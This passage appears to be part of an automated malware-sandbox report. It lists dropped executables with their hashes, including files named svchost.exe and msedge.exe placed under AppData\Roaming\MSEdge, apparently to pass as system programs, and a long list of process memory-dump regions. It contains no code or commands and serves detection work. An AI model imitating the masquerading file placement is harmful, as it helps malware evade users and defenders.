SHA512856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2
-
C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exeFilesize
75KB
MD5e0a68b98992c1699876f818a22b5b907
SHA1d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA2562b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2
-
C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exeFilesize
75KB
MD5e0a68b98992c1699876f818a22b5b907
SHA1d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA2562b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2
-
C:\Users\Admin\AppData\Local\Temp\tmp3AB7.tmp.exeFilesize
75KB
MD5e0a68b98992c1699876f818a22b5b907
SHA1d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA2562b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2
-
C:\Users\Admin\AppData\Local\Temp\tmp3AB7.tmp.exeFilesize
75KB
MD5e0a68b98992c1699876f818a22b5b907
SHA1d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA2562b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2
-
C:\Users\Admin\AppData\Local\Temp\tmp3AB7.tmp.exeFilesize
75KB
MD5e0a68b98992c1699876f818a22b5b907
SHA1d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA2562b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2
-
C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exeFilesize
16KB
MD5e8ac4929d4ef413e3c45abe2531cae95
SHA19ccd6320f053402699c802425e395010ef915740
SHA2567245d7d5573bfbd93e7939ad685b071d7755ebb62d8411f1984ce9dcc195f588
SHA512be3e14f1441839001f41f7c62ce3a5b7fb26927a0d8cd532eab7d000382e143b4f5b5468a60f6223dfecae3d4ad556a7f72b7e5d318783fc1d1858241bfb93e7
-
C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exeFilesize
16KB
MD5e8ac4929d4ef413e3c45abe2531cae95
SHA19ccd6320f053402699c802425e395010ef915740
SHA2567245d7d5573bfbd93e7939ad685b071d7755ebb62d8411f1984ce9dcc195f588
SHA512be3e14f1441839001f41f7c62ce3a5b7fb26927a0d8cd532eab7d000382e143b4f5b5468a60f6223dfecae3d4ad556a7f72b7e5d318783fc1d1858241bfb93e7
-
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exeFilesize
8.1MB
MD551ff42d909a879d42eb5f0e643aab806
SHA1affce62499d0f923f115228643a87ba5daece4e5
SHA256c0e187a0974b337fe6990e9a929c472dcf491282b8171322291a0ed6c1c653c3
SHA512bc948edfb59e58cc7f9a4c8e9052989e8d655323f79b29ac1a0ae5152bffd0847f8838091a51a33ffd0d1414b5afeed34870587931801f47da1ecff8915f9baf
-
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exeFilesize
8.1MB
MD551ff42d909a879d42eb5f0e643aab806
SHA1affce62499d0f923f115228643a87ba5daece4e5
SHA256c0e187a0974b337fe6990e9a929c472dcf491282b8171322291a0ed6c1c653c3
SHA512bc948edfb59e58cc7f9a4c8e9052989e8d655323f79b29ac1a0ae5152bffd0847f8838091a51a33ffd0d1414b5afeed34870587931801f47da1ecff8915f9baf
-
memory/60-239-0x0000000002680000-0x00000000027DF000-memory.dmpFilesize
1.4MB
-
memory/60-241-0x0000000002680000-0x00000000027DF000-memory.dmpFilesize
1.4MB
-
memory/60-247-0x0000000002990000-0x0000000002A39000-memory.dmpFilesize
676KB
-
memory/60-245-0x0000000000A10000-0x0000000000A16000-memory.dmpFilesize
24KB
-
memory/60-246-0x00000000028D0000-0x000000000298F000-memory.dmpFilesize
764KB
-
memory/60-236-0x0000000000000000-mapping.dmp
-
memory/888-139-0x00000000012F8000-0x00000000012FA000-memory.dmpFilesize
8KB
-
memory/888-133-0x00000000013C5000-0x00000000013D8000-memory.dmpFilesize
76KB
-
memory/1508-219-0x0000000000000000-mapping.dmp
-
memory/1508-232-0x0000000002FE0000-0x0000000003089000-memory.dmpFilesize
676KB
-
memory/1508-230-0x0000000002F10000-0x0000000002FCF000-memory.dmpFilesize
764KB
-
memory/1508-226-0x0000000000FC0000-0x0000000000FC6000-memory.dmpFilesize
24KB
-
memory/1508-181-0x0000000000000000-mapping.dmp
-
memory/1508-222-0x0000000000400000-0x000000000055F000-memory.dmpFilesize
1.4MB
-
memory/1792-180-0x00000000009CF000-0x00000000009D5000-memory.dmpFilesize
24KB
-
memory/1792-178-0x0000000000000000-mapping.dmp
-
memory/1852-213-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmpFilesize
10.8MB
-
memory/1852-202-0x0000000000000000-mapping.dmp
-
memory/1852-227-0x00000227E43D0000-0x00000227E4B76000-memory.dmpFilesize
7.6MB
-
memory/1852-228-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmpFilesize
10.8MB
-
memory/1852-206-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmpFilesize
10.8MB
-
memory/1852-205-0x0000021FC57A0000-0x0000021FC57A6000-memory.dmpFilesize
24KB
-
memory/2256-200-0x0000000000000000-mapping.dmp
-
memory/2956-188-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmpFilesize
10.8MB
-
memory/2956-210-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmpFilesize
10.8MB
-
memory/2956-231-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmpFilesize
10.8MB
-
memory/2956-216-0x000000001DD90000-0x000000001DDE0000-memory.dmpFilesize
320KB
-
memory/2956-187-0x00000000004E0000-0x0000000000556000-memory.dmpFilesize
472KB
-
memory/2956-184-0x0000000000000000-mapping.dmp
-
memory/2956-214-0x000000001E9F0000-0x000000001EBB2000-memory.dmpFilesize
1.8MB
-
memory/3304-235-0x0000000000000000-mapping.dmp
-
memory/3304-197-0x0000000000000000-mapping.dmp
-
memory/4052-215-0x000000001E650000-0x000000001EB78000-memory.dmpFilesize
5.2MB
-
memory/4052-171-0x0000000002330000-0x0000000002342000-memory.dmpFilesize
72KB
-
memory/4052-170-0x000000001CB10000-0x000000001CC1A000-memory.dmpFilesize
1.0MB
-
memory/4052-169-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmpFilesize
10.8MB
-
memory/4052-207-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmpFilesize
10.8MB
-
memory/4052-208-0x000000001DD00000-0x000000001DD76000-memory.dmpFilesize
472KB
-
memory/4052-168-0x0000000000220000-0x000000000029E000-memory.dmpFilesize
504KB
-
memory/4052-229-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmpFilesize
10.8MB
-
memory/4052-212-0x000000001CC20000-0x000000001CC3E000-memory.dmpFilesize
120KB
-
memory/4052-165-0x0000000000000000-mapping.dmp
-
memory/4052-174-0x000000001CC60000-0x000000001CC9C000-memory.dmpFilesize
240KB
-
memory/4084-132-0x0000000000000000-mapping.dmp
-
memory/4104-158-0x0000000000000000-mapping.dmp
-
memory/4140-217-0x0000000000000000-mapping.dmp
-
memory/4160-159-0x0000000000000000-mapping.dmp
-
memory/4228-138-0x0000000000400000-0x0000000000407000-memory.dmpFilesize
28KB
-
memory/4228-136-0x0000000000000000-mapping.dmp
-
memory/4228-157-0x0000000000400000-0x0000000000407000-memory.dmpFilesize
28KB
-
memory/4448-162-0x0000000000000000-mapping.dmp
-
memory/4544-143-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/4544-144-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/4544-151-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/4544-137-0x0000000000000000-mapping.dmp
-
memory/4544-140-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/4544-142-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/4764-148-0x0000000000D60000-0x0000000000D96000-memory.dmpFilesize
216KB
-
memory/4764-147-0x0000000000000000-mapping.dmp
-
memory/4764-153-0x0000000000D60000-0x0000000000D96000-memory.dmpFilesize
216KB
-
memory/4764-156-0x0000000000D60000-0x0000000000D96000-memory.dmpFilesize
216KB
-
memory/4944-193-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmpFilesize
10.8MB
-
memory/4944-189-0x0000000000000000-mapping.dmp
-
memory/4944-192-0x0000000000B50000-0x0000000000BA2000-memory.dmpFilesize
328KB
-
memory/4944-211-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmpFilesize
10.8MB
-
memory/5004-194-0x0000000000000000-mapping.dmp
-
memory/5024-172-0x0000000000000000-mapping.dmp